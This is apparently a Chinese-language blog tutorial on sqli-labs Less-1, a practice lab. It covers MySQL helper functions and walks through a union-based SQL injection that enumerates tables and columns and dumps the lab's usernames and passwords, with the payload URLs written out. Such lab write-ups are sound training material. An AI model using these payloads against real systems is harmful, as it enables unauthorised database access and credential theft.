sqli-labs less1
先來了解一下MYSQL注入的基本姿勢
url編碼:
- url中只能含有英文字母、阿拉伯數字和某些標點符號,不能使用其他文字和符號,所以要對其編碼
- sql注入中常用的url編碼有:空格%20,單引號%27,雙引號%22,井號%23
mysql中常用的系統表與函式:
- 系統資料庫information_schema儲存資料庫元資料,其中的tables儲存了表的元資料,常用欄位:table_schema(資料庫名),table_name(表名);columns儲存了列的元資料。常用欄位:column_name(列名),table_name(表名)
-
字元連線函式concat
1 2 3 4 5 6
select concat(1,2,3,4,5); +-------------------+ | concat(1,2,3,4,5) | +-------------------+ | 12345 | +-------------------+
-
concat_ws(第一個引數為分隔符)
1 2 3 4 5 6
select concat_ws(':',1,2,3,4,5); +--------------------------+ | concat_ws(':',1,2,3,4,5) | +--------------------------+ | 1:2:3:4:5 | +--------------------------+
-
group_concat(將多行查詢結果連線稱一行)
1 2 3 4 5 6
select group_concat(table_name) from tables where table_schema="security"; +-------------------------------+ | group_concat(table_name) | +-------------------------------+ | emails,referers,uagents,users | +-------------------------------+
-
char函式將ascii碼轉化成字元
1 2 3 4 5 6
select char(0x23,0x27,41,42,126); +---------------------------+ | char(0x23,0x27,41,42,126) | +---------------------------+ | #')*~ | +---------------------------+
-
user函式顯示當前使用者,database函式顯示使用資料庫,version函式顯示資料庫名稱和版本
1 2 3 4 5 6
select CONCAT_WS(CHAR(32,58,32),user(),database(),version()); +-------------------------------------------------------+ | CONCAT_WS(CHAR(32,58,32),user(),database(),version()) | +-------------------------------------------------------+ | [email protected] : information_schema : 10.1.32-MariaDB | +-------------------------------------------------------+
LESS 1 基於字串的注入
提示以數字id作為引數輸入 先讓id=’看看會不會報錯:
報錯了,錯誤資訊:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘’’’ LIMIT 0,1’ at line 1
可以看出引數為字串,於是構造union語句查出列數為3:
令id=0是因為經查詢發現表中沒有id=0的段,所以查詢結果就會變成union語句中的查詢結果,’和註釋符%23用來繞過查詢語句中的單引號,結果:
Welcome Dhakkan Your Login name:2 Your Password:3
於是構造查詢語句:
http://localhost/sqli-labs-master/Less-1/?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23
獲得了當前資料庫的表名:
Welcome Dhakkan Your Login name:emails,referers,uagents,users Your Password:3
繼續查詢users表的列名:
http://localhost/sqli-labs-master/Less-1/?id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name=’users’%23
結果:
Welcome Dhakkan Your Login name:USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password Your Password:3
最後的payload:
結果:
Welcome Dhakkan Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4 Your Password:Dumb,I-kill-you,[email protected],crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
—— soporbear.github.io/2018/05/27